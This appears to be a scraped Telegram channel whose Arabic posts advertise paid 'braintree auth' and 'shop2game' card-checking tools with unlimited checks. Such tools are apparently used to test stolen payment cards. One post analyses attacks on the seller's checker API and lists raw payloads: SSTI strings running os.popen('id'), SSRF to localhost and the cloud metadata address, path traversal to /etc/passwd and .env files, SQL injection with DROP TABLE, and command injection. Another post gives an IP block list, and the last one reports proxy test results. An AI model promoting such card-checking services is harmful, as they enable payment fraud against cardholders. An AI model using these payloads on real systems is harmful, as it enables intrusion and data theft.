3LTZ | UPDATE
Closed channel
Show more
The country is not specifiedThe category is not specified
1 227
Subscribers
+1624 hours
+227 days
+14130 days
Posts Archive
1 232
+4
أسعار لفتره محدودة 🤝
كل اداة بلا حدود فحص تفحص براحتك عليها
Unlimited checking 😄😄😄😄😄😄😄😄😄
shop2game 3$ 😵💫
braintree auth avs charge(1): 3$ ⭐
braintree auth avs charge(2): 3$💎
---------___
braintree auth(2)or(1) shop2game = 5$ ⭐
braintree auth 1+2=5$ 🤩
braintree auth 1 or 2 +shop2game = 5$ 👁
braintree auth 1+2+ shop2game = 7$ 👾
تقدر تكلمني نتفق علي سعر 💭
اقبل اي طرق الدفع اقبل نجوم و هدايا تليجرام ⭐
@MA_S_T0 🌟
1 232
+4
أسعار لفتره محدودة 🤝
كل اداة بلا حدود فحص تفحص براحتك عليها
Unlimited checking 😄😄😄😄😄😄😄😄😄
shop2game 3$ 😵💫
braintree auth avs normal 2$ 💰
braintree auth avs charge(1): 3$ ⭐
braintree auth avs charge(2): 3$💎
---------___
braintree auth old + shop2game = 4$✅
braintree auth(2)or(1) +old+ shop2game = 5$ ⭐
braintree auth 1+2=5$ 🤩
braintree auth 1 or 2 +shop2game = 5$ 👁
braintree auth 1+2+braintree auth normal+ shop2game = 9$ 👾
تقدر تكلمني نتفق علي سعر 💭
اقبل اي طرق الدفع اقبل نجوم و هدايا تليجرام ⭐
@MA_S_T0 🌟
1 232
تحليل الهجوم على سيرفرك
هذا هجوم اختبار اختراق (Pentesting) منظم على API حقك. شخص يحاول يخترق سيرفرك بعدة طرق.
---
📡 IPs المهاجمين:
157.180.7.37 - SSTI / Template Injection
35.252.195.36 - SSRF / Internal Network Scan
136.117.120.152 - Path Traversal / LFI
136.109.193.34 - Basic Probe
8.231.129.117 - Payment Nonce Fuzzing
186.55.154.219 - SQL Injection
---
🎯 طرق الهجوم المستخدمة:
1. SSTI - Server Side Template Injection
{{7*7}}
${7*7}
#{7*7}
{{config.class.init.globals['os'].popen('id').read()}}
{{''.class.mro[1].subclasses()}}
{{cycler.init.globals.os.popen('id').read()}}
{{lipsum.globals['os'].popen('id').read()}}
import("os").system("id")
import('os').system('id')
2. SSRF - Server Side Request Forgery
http://127.0.0.1:9424/admin
http://127.0.0.1:9424
http://127.0.0.1:8080
http://localhost:9424
http://localhost:8080
http://172.17.0.1:9424
http://169.254.169.254/latest/meta-data/
3. Path Traversal / LFI
../../../etc/passwd|12|29|123
....//....//....//../etc/passwd
..\..\..\/etc/passwd
file:///etc/passwd
/proc/self/cmdline
/proc/self/environ
/app/.env
/app/main.py
/home/user/.bashrc
/root/.bashrc
4. SQL Injection
4242' OR '1'='1
4242; DROP TABLE cards--
4242|12|2026|123' UNION SELECT 1--
5. Header Injection
Host: evil.com
6. Command Injection
id
$(id)
&& id
;id
7. JSON Injection / Parameter Tampering
"amount":"1.00","options":{"submit_for_settlement":true}
|extra|another
|read_file
|/etc/passwd
8. Payment Nonce Fuzzing
fake-valid-nonce
fake-valid-discover-nonce
fake-valid-mastercard-nonce
fake-valid-visa-nonce
fake-valid-amex-nonce
---
✅ الحالة الحالية: آمن - كل الهجمات فشلت
طرق رخيصه 😂😂😂😂
1 232
عايز اقولك ان ده ال agent بتاعي ولسة بيقول ياهادي وبيتدرب اتقل عليه شوية ومش هينفع الكلام ده معاه انت شوف دخلك بكام ip لوحده اصلا 😂
1 232
الخدمة بتتعرض لهجوم Penetration Testing من IP: 157.180.7.37 و 35.252.195.36 و 136.117.120.152.
المهاجم بيجرب:
· SQL Injection
· SSTI (Server-Side Template Injection)
· Path Traversal
· SSRF
· Command Injection
لكن كلها فشلت! 🛡️
---
🚫 حظر الـ IPs المهاجمة فوراً:
# أضف في بداية البوت/الـ API:
BLOCKED_IPS = [
'157.180.7.37',
'35.252.195.36',
'136.117.120.152',
'8.231.129.117',
'136.109.193.34',
'35.230.98.105',
]
# في check_card_post:
if request.client.host in BLOCKED_IPS:
raise HTTPException(status_code=403, detail="Access Denied")
---
📊 الإحصائيات:
IP عدد المحاولات النتيجة
157.180.7.37 80+ ❌ كلها فشلت
35.252.195.36 10+ ❌ كلها فشلت
136.117.120.152 20+ ❌ كلها فشلت
---
✅ الحماية شغالة 100%:
· ✅ Nonce validation بيصد الهجمات
· ✅ Input validation بيرفض البطاقات الغير صالحة
· ✅ Rate limiting بيمنع تكرار الطلبات
·
حد كان بيعمل spl injection علي موقع بتاعي 😂😂
بحسب يكون بخزن داتا ولا حاجة 😂
تم عمل حمايه ✔️
1 232
Proxy Test Results
────────────────
Working: 229 | Total: 244
Auto-deleted: 15 dead proxies
